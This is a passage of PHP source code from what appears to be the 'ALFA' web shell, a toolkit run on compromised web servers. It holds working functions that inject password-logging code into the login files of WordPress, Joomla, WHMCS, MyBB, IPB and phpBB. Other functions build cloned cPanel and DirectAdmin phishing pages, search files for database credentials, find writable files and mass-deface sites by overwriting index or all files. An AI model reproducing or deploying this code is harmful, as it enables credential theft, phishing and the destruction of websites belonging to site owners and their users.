        $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
        $redirect_wp = '#if[ ]{0,}\\([ ]{0,}![ ]{0,}is_wp_error\\([ ]{0,}\\$user[ ]{0,}\\)[ ]{0,}&&[ ]{0,}![ ]{0,}\\$reauth[ ]{0,}\\)[ ]{0,}{#';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/wp-login.php";
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (@preg_match($redirect_wp, $data_login, $match)) {
                $evil_login = "\t" . $match[0] . "\n\t" . $code;
                $login_replace = @preg_replace($redirect_wp, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackJoomla($path, $saveto)
    {
        $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $comp = $path . "/administrator/components/com_login/";
        if (@is_file($comp . "/login.php")) {
            $login = $comp . "/login.php";
        } elseif (@is_file($comp . "/admin.login.php")) {
            $login = $comp . "/admin.login.php";
        } else {
            $login = '';
        }
        if (@is_file($login) and @is_writable($login) and $login != '') {
            $data_login = @file_get_contents($login);
            $evil_login = $code . "\n" . $data_login;
            @file_put_contents($login, $evil_login);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    }
    function hijackWhmcs($path, $saveto)
    {
        $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $conf = $path . "/configuration.php";
        if (@is_file($conf) and @is_writable($conf)) {
            $data_conf = @file_get_contents($conf);
            if (!strstr($data_conf, '?>')) {
                $code = '?>' . $code;
            }
            $evil_conf = $data_conf . "\n" . $code;
            @file_put_contents($conf, $evil_conf);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    }
    function hijackMybb($path, $saveto)
    {
        $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
        $find = '$loginhandler->complete_login();';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/member.php";
        $evil_login = "\t" . $code . "\n\t" . $find;
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (strstr($data_login, $find)) {
                $login_replace = str_replace($find, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackIPB($path, $saveto)
    {
        $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
        $find = 'unset( $member[\'plainPassword\'] );';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/admin/sources/handlers/han_login.php";
        $evil_login = "\tunset( \$member['plainPassword'] );\n\t" . $code;
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (strstr($data_login, $find)) {
                $login_replace = str_replace($find, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackPHPBB($path, $saveto)
    {
        $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
        $find = 'case \'login\':';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/ucp.php";
        $evil_login = "\tcase 'login':\n\t" . $code;
        if (@is_file($login) and @is_writable($login)) {
            $data_login = @file_get_contents($login);
            if (strstr($data_login, $find)) {
                $login_replace = str_replace($find, $evil_login, $data_login);
                @file_put_contents($login, $login_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackOutput($c = 0, $p = '')
    {
        echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : '<center><font color="red">Error in inject code !</font></center>';
    }
    function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array())
    {
        if (@is_dir($dir)) {
            $files = @scandir($dir);
            foreach ($files as $key => $value) {
                $path = @realpath($dir . DIRECTORY_SEPARATOR . $value);
                if (!@is_dir($path)) {
                    if ($ext != '*') {
                        $f = basename($path);
                        $f = explode('.', $f);
                        $f = end($f);
                        if ($f != $ext) {
                            continue;
                        }
                    }
                    if ($e == 'str') {
                        $content = @file_get_contents($path);
                        if (strpos($content, $string) !== false) {
                            echo str_replace('\\', '/', $path) . "<br>";
                        }
                    } else {
                        if (strstr($value, $string)) {
                            echo str_replace('\\', '/', $path) . "<br>";
                        }
                    }
                    $results[] = $path;
                } elseif ($value != "." && $value != "..") {
                    Alfa_StrSearcher($path, $string, $ext, $e, $results);
                    $results[] = $path;
                }
            }
        }
    }
    function alfafakepage()
    {
        alfahead();
        AlfaNum(9, 10);
        echo "<div class=header><br>\r\n\t<center><div class=\"txtfont_header\">| Host Manager Fake page |</div></center><br><br><form onSubmit=\"g('fakepage',null,this.clone_page.value,this.fake_root.value,'>>',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;\" method='post'>\r\n\t<div class=\"txtfont\" style=\"position: relative;left: 50%;transform: translate(-50%);\"><div style=\"margin-bottom:6px;\"><span style=\"display: inline-block;width: 106px;\">Panel: </span><select style=\"width:100px;\" name=\"panel\">";
        $cm_array = array("cpanel" => "Cpanel", "directadmin" => "DirectAdmin");
        foreach ($cm_array as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select></div>";
        echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
	<div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="' . $_SERVER["DOCUMENT_ROOT"] . '/fake_page_root/"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="' . $_SERVER["DOCUMENT_ROOT"] . '/index.php"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: ' . $_SERVER["DOCUMENT_ROOT"] . '/wp-login.php"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="' . $GLOBALS['cwd'] . 'logs.txt"></div>
	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
	<div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
        $clone_page = $_POST['alfa1'];
        $fake_root = $_POST['alfa2'];
        $logto = $_POST['alfa4'];
        $panel = $_POST['alfa5'];
        $inject_to = $_POST['alfa6'];
        $bind_on = $_POST['alfa7'];
        $count = $_POST['alfa8'];
        if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>') {
            echo __pre();
            $target = $clone_page;
            $curl = new AlfaCURL();
            $source_page = $curl->Send($target);
            if (!empty($source_page)) {
                $matched_form = "";
                if ($panel == "cpanel") {
                    if (preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)) {
                        $matched_form = $match[0];
                    }
                } else {
                    if (preg_match('#<form(.*?)>#', $source_page, $match)) {
                        $matched_form = $match[0];
                    }
                }
                if (!empty($matched_form)) {
                    $fake = "";
                    $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
                    $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
                    if ($panel == "cpanel") {
                        $port = "2083";
                    } else {
                        $target = str_replace(array("http://", "https://"), "", $target);
                        $port = explode(":", $target);
                        $port = $port[1];
                    }
                    if (substr($uri, 0, 1) == "/") {
                        $uri = substr($uri, 1);
                    }
                    $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
                    $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
                    if ($panel == "cpanel") {
                        $form = '<form novalidate id="login_form" action="' . $log_url . '" method="post" target="_top" style="visibility:">';
                    } else {
                        $form = '<form action="' . $log_url . '" method="post">';
                    }
                    $fake = str_replace($matched_form, $form, $source_page);
                    if (@(!is_dir($fake_root))) {
                        @mkdir($fake_root, 0777, true);
                    }
                    $cookie_name = "alfa_fakepage_counter" . rand(9999, 99999);
                    $post_user = 'user';
                    $post_pass = 'pass';
                    $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
                    if ($panel != "cpanel") {
                        $post_user = 'username';
                        $post_pass = 'password';
                        $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
                    }
                    $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["' . $post_user . '"];$pass = $_POST["' . $post_pass . '"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["' . $cookie_name . '"])){@setcookie("' . $cookie_name . '", 0, $cook_time, "/");$_COOKIE["' . $cookie_name . '"]=1;}if((int)$_COOKIE["' . $cookie_name . '"]>' . $count . '){@header("Location: /");exit;}@setcookie("' . $cookie_name . '", ((int)$_COOKIE["' . $cookie_name . '"] + 1), $cook_time, "/");$fp = @fopen("' . $logto . '", "a+");@fwrite($fp, $user . " : " . $pass . "\\n");fclose($fp);sleep(3);' . $resp_code . 'exit;}?>';
                    @file_put_contents($fake_root . '/log.php', $cpanel_log);
                    if ($panel == "cpanel") {
                        $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="' . $target . '/$2">', '<img class="main-logo" src="' . $target . '/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
                    }
                    @file_put_contents($fake_root . '/index.php', $fake);
                    $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["' . $cookie_name . '"]<' . $count . '){@include("' . $fake_root . '/index.php");exit;}?>';
                    $bind_on_code = '<?php if((int)$_COOKIE["' . $cookie_name . '"]<' . $count . '){@header("Location: ' . $uri . '");exit;}?>';
                    @file_put_contents($inject_to, $inject_code . "\n" . @file_get_contents($inject_to));
                    @file_put_contents($bind_on, $bind_on_code . "\n" . @file_get_contents($bind_on));
                    echo "success...!";
                } else {
                    echo "failed...!";
                }
            } else {
                echo "<div style='text-align:center;color:red;'>Cannot open the target...!</div>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaarchive_manager()
    {
        alfahead();
        $file = $_POST['alfa2'];
        if (!file_exists($file)) {
            $file = $GLOBALS['cwd'];
        }
        $rand_id = rand(9999, 999999);
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Archive Manager |</div></p>";
        echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
	<div class="txtfont">
	Archive file: <input size="50" id="target" type="text" name="file" value="' . $file . '">
	<input type="submit" name="btn" value=" "></div></form></center><br>';
        if ($_POST['alfa5'] == '>>') {
            echo '<hr><div style="margin-left: 12px;" archive_full="phar://' . $file . '" archive_name="' . basename($file) . '" id="archive_dir_' . $rand_id . '" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
            echo '<div style="padding: 10px;" id="archive_base_' . $rand_id . '">';
            __alfa_open_archive_file($file, $rand_id);
            echo "</div>";
        }
        echo "</div>";
        alfafooter();
    }
    function __alfa_open_archive_file($arch, $base_id = 0)
    {
        try {
            $files = array();
            $dirs = array();
            $archive = new PharData($arch);
            foreach ($archive as $file) {
                $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
                if ($file->isDir()) {
                    $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
                } else {
                    $file_size = @filesize($file->getPathname());
                    $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
                }
            }
            function __alfa_open_archive_usort($a, $b)
            {
                return strcmp(strtolower($a['name']), strtolower($b['name'])) * 1;
            }
            usort($dirs, "__alfa_open_archive_usort");
            usort($files, "__alfa_open_archive_usort");
            $files = array_merge($dirs, $files);
            echo "<table width=\"100%\" class=\"main\" cellspacing=\"0\" cellpadding=\"2\"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>";
            $icon = '<img class="archive-icons" src="' . findicon('..', 'dir') . '" width="30" height="30">';
            echo '<tr><th><a base_id="' . $base_id . '" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="' . dirname($arch . '.php') . '">' . $icon . '<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
            foreach ($files as $file) {
                $icon = '<img class="archive-icons" src="' . findicon($file['name'], $file['type']) . '" width="30" height="30">';
                if ($file["type"] == "dir") {
                    echo '<tr><th><a base_id="' . $base_id . '" class="archive-file-row" onclick="alfaOpenArchive(this);" path="' . $file["path"] . '" fname="' . $file["name"] . '">' . $icon . '<span class="archive-name archive-type-dir">| ' . $file["name"] . ' |</span></a><td>dir</td><td>' . $file["modify"] . '</td><td>-</td></tr>';
                } else {
                    echo "<tr><th><a base_id='" . $base_id . "' class='archive-file-row' onclick=\"editor('" . $file["path"] . "','auto','','','','file');\">" . $icon . "<span class='archive-name archive-type-file' fname='" . $file["name"] . "'>" . $file["name"] . "</span></a><td>" . alfaSize($file["size"]) . "</td><td>" . $file["modify"] . "</td><td>-</td></tr>";
                }
            }
            echo "</table>";
        } catch (Exception $e) {
            echo "0";
        }
    }
    function alfaopen_archive_dir()
    {
        $dir = $_POST["alfa1"];
        $base_id = $_POST["alfa2"];
        __alfa_open_archive_file($dir, $base_id);
    }
    function alfaconfig_grabber()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Config Grabber |</div></p>";
        echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
	<div class="txtfont">
	Dir: <input size="50" id="target" type="text" name="dir" value="' . $GLOBALS['cwd'] . '">
	Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
	<input type="submit" name="btn" value=" "></div></form></center><br>';
        $dir = $_POST['alfa2'];
        $ext = $_POST['alfa3'];
        if ($_POST['alfa5'] == '>>') {
            echo __pre();
            Alfa_ConfigGrabber($dir, $ext);
        }
        echo "</div>";
        alfafooter();
    }
    function Alfa_ConfigGrabber($dir, $ext)
    {
        $pattern = "#define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")password(?:'|\")\\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
        $db_files = array("wp-config.php", "configure.php", "config.inc.php", "configuration.php", "config.php", "conf.php", "dbclass.php", "class_core.php", "dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
        if (@is_readable($dir)) {
            $globFiles = @glob("{$dir}/*.{$ext}");
            $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR);
            $blacklist = array();
            foreach ($globDirs as $dir) {
                if (!@is_readable($dir) || @is_link($dir)) {
                    continue;
                }
                @Alfa_ConfigGrabber($dir, $ext);
            }
            foreach ($globFiles as $file) {
                $filee = @file_get_contents($file);
                if (preg_match($pattern, $filee)) {
                    echo "<div><span>{$file}</span> <a style='cursor:pointer;' onclick=\"editor('" . $file . "','auto','','','','file');\">[ View file ]</a></div>";
                }
            }
        }
    }
    function alfasearcher()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Searcher |</div></p><h3><a href=javascript:void(0) onclick=\"g('searcher',null,'file')\">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick=\"g('searcher',null,'str')\">| Find Files By Name | </a></h3></center>";
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'file') {
            echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="' . $GLOBALS['cwd'] . '">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
            $dir = $_POST['alfa2'];
            $ext = $_POST['alfa3'];
            $method = $_POST['alfa4'];
            if ($_POST['alfa5'] == '>>') {
                echo __pre();
                if (substr($dir, -1) == '/') {
                    $dir = substr($dir, 0, -1);
                }
                Alfa_Searcher($dir, trim($ext), $method);
            }
        }
        if ($_POST['alfa1'] == 'str') {
            echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
<div class="txtfont">
Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="' . $GLOBALS['cwd'] . '">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
            $dir = $_POST['alfa2'];
            $string = $_POST['alfa3'];
            $ext = $_POST['alfa5'];
            if (!empty($string) and !empty($dir) and $_POST['alfa4'] == '>>') {
                echo __pre();
                Alfa_StrSearcher($dir, $string, $ext, $_POST['alfa6']);
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaMassDefacer()
    {
        alfahead();
        AlfaNum(5, 6, 7, 8, 9, 10);
        echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
        echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
	Mass dir: <input size="50" id="target" type="text" name="massdir" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
	DefPage: <input size="50" type="text" name="defpage" value="' . htmlspecialchars($GLOBALS['cwd']) . '"></div> <input type="submit" name="btn" value=" "></center></p>
</form>';
        $dir = $_POST['alfa1'];
        $defpage = $_POST['alfa2'];
        $method = $_POST['alfa3'];
        $fCurrent = $GLOBALS['__file_path'];
        if ($_POST['alfa4'] == '>>') {
            if (!empty($dir)) {
                if (@is_dir($dir)) {
                    if (@is_readable($dir)) {
                        if (@is_file($defpage)) {
                            if ($dh = @opendir($dir)) {
                                echo __pre();
                                while (($file = @readdir($dh)) !== false) {
                                    if ($file == '..' || $file == '.') {
                                        continue;
                                    }
                                    $newfile = $dir . $file;
                                    if ($fCurrent == $newfile) {
                                        continue;
                                    }
                                    if (@is_dir($newfile)) {
                                        Alfa_ReadDir($newfile, $method, $defpage);
                                    } else {
                                        if (!@is_writable($newfile)) {
                                            continue;
                                        }
                                        if (!@is_readable($newfile)) {
                                            continue;
                                        }
                                        Alfa_Rewriter($newfile, $file, $defpage, $method);
                                    }
                                }
                                closedir($dh);
                            } else {
                                __alert('<font color="red">Error In OpenDir...</font>');
                            }
                        } else {
                            __alert('<font color="red">DefPage File NotFound...</font>');
                        }
                    } else {
                        __alert('<font color="red">Directory is not Readable...</font>');
                    }
                } else {
                    __alert('<font color="red">Mass Dir is Invalid Dir...</font>');
                }
            } else {
                __alert('<font color="red">Dir is Empty...</font>');
            }
        }
        echo "</div>";
        alfafooter();
    }
    function Alfa_ReadDir($dir, $method = '', $defpage = '')
    {
        if (!@is_readable($dir)) {
            return false;
        }
        if (@is_dir($dir)) {
            if ($dh = @opendir($dir)) {
                while (($file = readdir($dh)) !== false) {
                    if ($file == '..' || $file == '.') {
                        continue;
                    }
                    $newfile = $dir . '/' . $file;
                    if (@is_readable($newfile) && @is_dir($newfile)) {
                        Alfa_ReadDir($newfile, $method, $defpage);
                    }
                    if (@is_file($newfile)) {
                        if (!@is_readable($newfile)) {
                            continue;
                        }
                        Alfa_Rewriter($newfile, $file, $defpage, $method);
                    }
                }
                closedir($dh);
            }
        }
    }
    function Alfa_Rewriter($dir, $file, $defpage, $m = 'index')
    {
        if (!@is_writable($dir)) {
            return false;
        }
        if (!@is_readable($dir)) {
            return false;
        }
        $defpage = @file_get_contents($defpage);
        if ($m == 'index') {
            $indexs = array('index.php', 'index.htm', 'index.html', 'default.asp', 'default.aspx', 'index.asp', 'index.aspx', 'index.js');
            if (in_array(strtolower($file), $indexs)) {
                @file_put_contents($dir, $defpage);
                echo @is_file($dir) ? $dir . "<b><font color='red'>DeFaced...</b></font><br>" : '';
            }
        } elseif ($m == 'all') {
            @file_put_contents($dir, $defpage);
            echo @is_file($dir) ? $dir . "  <b><font color='red'>DeFaced...</b></font><br>" : '';
        }
    }
    function alfaGetDisFunc()
    {
        alfahead();
        echo "<div class=\"header\">";
        $disfun = @ini_get('disable_functions');
        $s = explode(',', $disfun);
        $f = array_unique($s);
        echo "<center><br><b><font color=\"#7CFC00\">Disable Functions</font></b><pre><table border=\"1\"><tr><td align=\"center\" style=\"background-color: green;color: white;width:5%\">#</td><td align=\"center\" style=\"background-color: green;color: white;\">Func Name</td></tr>";
        $i = 1;
        foreach ($f as $s) {
            $s = trim($s);
            if (function_exists($s) || !is_callable($s)) {
                continue;
            }
            echo '<tr><td align="center" style="background-color: black;">' . $i . '</td>';
            echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.' . str_replace('_', '-', $s) . '.php"><span class="disable_functions"><b>' . $s . '</b></span></a></td>';
            $i++;
        }
        echo "</table></center>";
        echo "</div>";
        alfafooter();
    }
    function Alfa_Create_A_Tag($action, $vals)
    {
        $nulls = array();
        foreach ($vals as $key => $val) {
            echo '<a href=javascript:void(0) onclick="g(\'' . $action . '\',';
            for ($i = 1; $i <= $val[1] - 1; $i++) {
                $nulls[] = 'null';
            }
            $f = implode(',', $nulls);
            echo $f . ',\'' . $val[0] . '\');return false;">| ' . $key . ' | </a>';
            unset($nulls);
        }
    }
    function Alfa_Searcher($dir, $ext, $method)
    {
        if (@is_readable($dir)) {
            if ($method == 'all') {
                $ext = '*';
            }
            if ($method == 'dirs') {
                $ext = '*';
            }
            $globFiles = @glob("{$dir}/*.{$ext}");
            $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR);
            $blacklist = array();
            foreach ($globDirs as $dir) {
                if (!@is_readable($dir) || @is_link($dir)) {
                    continue;
                }
                @Alfa_Searcher($dir, $ext, $method);
            }
            switch ($method) {
                case "files":
                    foreach ($globFiles as $file) {
                        if (@is_writable($file)) {
                            echo "{$file}<br>";
                        }
                    }
                    break;
                case "dirs":
                    foreach ($globFiles as $file) {
                        if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) {
                            echo dirname($file) . '<br>';
                            $blacklist[] = dirname($file);
                        }
                    }
                    break;
                case "all":
                    foreach ($globFiles as $file) {
                        echo $file . '<br>';
                    }
                    break;
            }
            unset($blacklist);
        }
    }
    function AlfaiFrameCreator($f, $width = '100%', $height = '600px')
    {
        return "<iframe src=\"ALFA_DATA/" . $f . '" width="' . $width . '" height="' . $height . '" frameborder="0"></iframe>';
    }
    class AlfaCURL
    {
        public $headers;
        public $user_agent;
        public $compression;
        public $cookie_file;
        public $proxy;
        public $path;
        public $ssl = true;
        public $curl_status = true;
        function __construct($cookies = false, $compression = 'gzip', $proxy = '')
        {
            if (!extension_loaded('curl')) {
                $curl_status = false;
                return false;
            }
            $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
            $this->headers[] = 'Connection: Keep-Alive';
            $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
            $this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
            $this->path = "ALFA_TEMPDIR/Alfa_cookies.txt";
            $this->compression = $compression;
            $this->proxy = $proxy;
            $this->cookies = $cookies;
            if ($this->cookies) {
                $this->cookie($this->path);
            }
        }
        function cookie($cookie_file)
        {
            if (_alfa_file_exists($cookie_file, false)) {
                $this->cookie_file = $cookie_file;
            } else {
                @fopen($cookie_file, 'w') or die($this->error('The cookie file could not be opened.'));
                $this->cookie_file = $cookie_file;
                @fclose($this->cookie_file);
            }
        }
        function Send($url, $method = "get", $data = "")
        {
            if (!$this->curl_status) {
                return false;
            }
            $process = curl_init($url);
            curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
            curl_setopt($process, CURLOPT_HEADER, 0);
            curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
            curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($process, CURLOPT_ENCODING, $this->compression);
            curl_setopt($process, CURLOPT_TIMEOUT, 30);
            if ($this->ssl) {
                curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false);
            }
            if ($this->cookies) {
